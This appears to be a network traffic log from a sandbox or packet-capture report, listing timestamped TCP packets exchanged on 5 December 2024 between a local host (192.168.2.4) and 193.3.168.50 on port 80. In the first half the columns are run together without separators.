                                                                                                                  Dec 5, 2024 10:53:29.044405937 CET8049752193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.044461966 CET4975280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.163403988 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:29.393503904 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:29.513381004 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.282882929 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.330672979 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.517685890 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.565030098 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.642108917 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.642378092 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762159109 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.762173891 CET8049753193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:30.762255907 CET4975380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762357950 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.762357950 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:30.882159948 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:31.112122059 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:31.232314110 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.009406090 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.049436092 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.245738029 CET8049754193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.299577951 CET4975480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.360023022 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.479895115 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.479965925 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.480103970 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.599890947 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:32.830878973 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:32.950721979 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.690920115 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.691200972 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.718775988 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.718904018 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.811896086 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.812057972 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.812182903 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.812398911 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.813009977 CET8049755193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.813188076 CET4975580192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.931857109 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.932049036 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:33.932118893 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:33.932337999 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.052050114 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.159106016 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.278862000 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.278956890 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:34.283932924 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:34.403753042 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.050003052 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.096358061 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.170809984 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.221303940 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.285732031 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.330703974 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.405895948 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.455679893 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.531600952 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.531794071 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.532007933 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.651608944 CET8049756193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.651684046 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.651715040 CET4975680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.651793957 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.652005911 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.652065039 CET8049757193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:35.652261019 CET4975780192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:35.771682978 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.002718925 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:36.122550964 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.889818907 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:36.940042973 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.125454903 CET8049758193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.174421072 CET4975880192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.250484943 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.370436907 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.370515108 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.370738983 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.490540981 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:37.750035048 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:37.870045900 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.607925892 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.658787012 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.841646910 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:38.893168926 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.968492985 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:38.968787909 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088535070 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.088612080 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088669062 CET8049759193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.088768005 CET4975980192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.088969946 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.208636045 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:39.440166950 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:39.560082912 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.327800989 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.377552986 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.385412931 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.385687113 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.505372047 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.505814075 CET8049760193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.505913973 CET4976080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.508764982 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.566241026 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:40.686192989 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:53:40.952542067 CET4976180192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.027368069 CET4976280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:53:41.072427034 CET8049761193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.810075998 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.810098886 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:00.815298080 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:00.935331106 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.580931902 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.627897024 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.700419903 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.752685070 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.813365936 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.862085104 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:01.933358908 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:01.986967087 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.058713913 CET4977480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062325001 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062391996 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.062736988 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182332993 CET8049783193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182400942 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182404995 CET4978380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182488918 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182672024 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.182737112 CET8049784193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.182795048 CET4978480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.304013968 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:02.533929110 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:02.653800964 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.423392057 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.471482038 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.657381058 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:03.721338034 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.976929903 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:03.977839947 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097584963 CET8049790193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.097657919 CET4979080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097703934 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.097769976 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.097999096 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.217690945 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:04.456852913 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:04.576601028 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.335057974 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.377723932 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.573086977 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.627616882 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.685853958 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.686168909 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.805866957 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.805953026 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.806121111 CET8049796193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:05.806138039 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.806204081 CET4979680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:05.929223061 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.159145117 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.278987885 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.816591978 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.816673994 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.936503887 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.936578035 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.937311888 CET8049802193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:06.937504053 CET4980280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.938783884 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:06.939593077 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.058481932 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.059396982 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.059544086 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.059884071 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.179558039 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.284147024 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.403945923 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.406651020 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:07.408967972 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:07.529856920 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.175604105 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.221381903 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.298099995 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.346390009 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.409806013 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.458518982 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.533394098 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:08.580729961 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.928621054 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.929025888 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:08.929150105 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.048721075 CET8049803193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.048782110 CET4980380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.048832893 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.048906088 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.049104929 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.049263954 CET8049804193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.049316883 CET4980480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.169317007 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:09.393372059 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:09.513077974 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.287276983 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.330741882 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.521159887 CET8049810193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.565376997 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.644793034 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.764688969 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:10.765209913 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.765209913 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:10.885003090 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:11.112150908 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:11.231983900 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.002557993 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.049494028 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.237816095 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.283864975 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.360265017 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.360296965 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480114937 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.480635881 CET8049816193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.480722904 CET4981680192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480734110 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.480917931 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.600589991 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:12.830893040 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:12.951128006 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.425530910 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.425852060 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.543184996 CET4981080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.546737909 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.546849966 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.546973944 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.547054052 CET8049822193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.547111988 CET4982280192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.549285889 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.666688919 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.668977022 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.669105053 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.669290066 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:13.788898945 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:13.937997103 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.048043966 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.057769060 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.057837963 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.168317080 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.785610914 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.830746889 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:14.907636881 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:14.955756903 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.021601915 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.065104961 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.141366959 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.190126896 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.266954899 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.267471075 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.267956018 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387212992 CET8049823193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387331963 CET4982380192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387686014 CET8049824193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387722015 CET8049830193.3.168.50192.168.2.4
                                                                                                                  Dec 5, 2024 10:54:15.387739897 CET4982480192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.387804031 CET4983080192.168.2.4193.3.168.50
                                                                                                                  Dec 5, 2024 10:54:15.388012886 CET4983080192.168.2.4193.3.168.50
Timestamp                           Source Port  Dest Port  Source IP      Dest IP
Dec 5, 2024 10:54:15.507657051 CET  80           49830      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:15.737174988 CET  49830        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:15.856930971 CET  80           49830      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:16.625627995 CET  80           49830      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:16.674504995 CET  49830        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:16.861372948 CET  80           49830      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:16.908973932 CET  49830        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.033740997 CET  49830        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.034343004 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.153973103 CET  80           49830      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:17.154081106 CET  49830        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.154088974 CET  80           49835      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:17.154169083 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.154334068 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.273978949 CET  80           49835      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:17.502710104 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:17.622493982 CET  80           49835      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:18.393225908 CET  80           49835      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:18.440114021 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:18.629383087 CET  80           49835      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:18.674495935 CET  49835        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:18.754827023 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:18.874644995 CET  80           49841      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:18.875077009 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:18.875300884 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:18.996150970 CET  80           49841      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:19.221476078 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:19.341434956 CET  80           49841      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.035079956 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.035214901 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.113811970 CET  80           49841      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.113867998 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.154841900 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.154917002 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.155073881 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.155261993 CET  80           49841      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.155308962 CET  49841        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.156754971 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.274751902 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.276416063 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.276479006 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.276611090 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.396317959 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.502754927 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.622591019 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.622613907 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:20.627729893 CET  49844        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:20.748953104 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:21.393438101 CET  80           49842      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:21.440124035 CET  49842        80         192.168.2.4    193.3.168.50
Dec 5, 2024 10:54:21.515396118 CET  80           49844      193.3.168.50   192.168.2.4
Dec 5, 2024 10:54:21.565130949 CET  49844        80         192.168.2.4    193.3.168.50
